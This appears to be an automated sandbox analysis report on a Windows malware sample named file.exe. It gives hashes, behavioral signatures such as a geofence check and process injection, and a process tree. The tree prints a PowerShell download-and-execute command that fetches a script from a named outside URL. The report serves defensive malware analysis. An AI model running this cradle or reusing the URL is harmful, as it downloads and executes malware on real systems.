Analysis
-
max time kernel
153s -
max time network
164s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
24/11/2022, 09:29
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
file.exe
Resource
win10v2004-20221111-en
General
-
Target
file.exe
-
Size
119KB
-
MD5
5ad4cb63866d6502bf51970f7fab4013
-
SHA1
06df9e6e396a6db1c85d4a95aa349bc8120e24ba
-
SHA256
2e8fb9fd2065203501a8eab1759bbf0d64b54f887827b9a6b5bf9fe02d95dc8c
-
SHA512
c5d978d3a46aed084fe0ff8e35954e72c34ac30a10ca6903b6983b57a13008a1dad23455dac1d56b1d87207fb052373060686bcf7a3b9c89e72c14601675352f
-
SSDEEP
3072:zclqrchvLHuvYlEOwqSnvcuz060HARqcpyDRD27H:zuqr09h2vc5NEH
Malware Config
Extracted
https://thetechdevelopers.com/wp-content/config_20.ps1
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 73 4720 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation file.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4720 powershell.exe 4720 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4720 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 740 wrote to memory of 3368 740 file.exe 88 PID 740 wrote to memory of 3368 740 file.exe 88 PID 3368 wrote to memory of 4720 3368 cmd.exe 90 PID 3368 wrote to memory of 4720 3368 cmd.exe 90
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:740 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://thetechdevelopers.com/wp-content/config_20.ps1')"2⤵
- Suspicious use of WriteProcessMemory
PID:3368 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command IEX(New-Object Net.Webclient).DownloadString('https://thetechdevelopers.com/wp-content/config_20.ps1')3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4720
-
-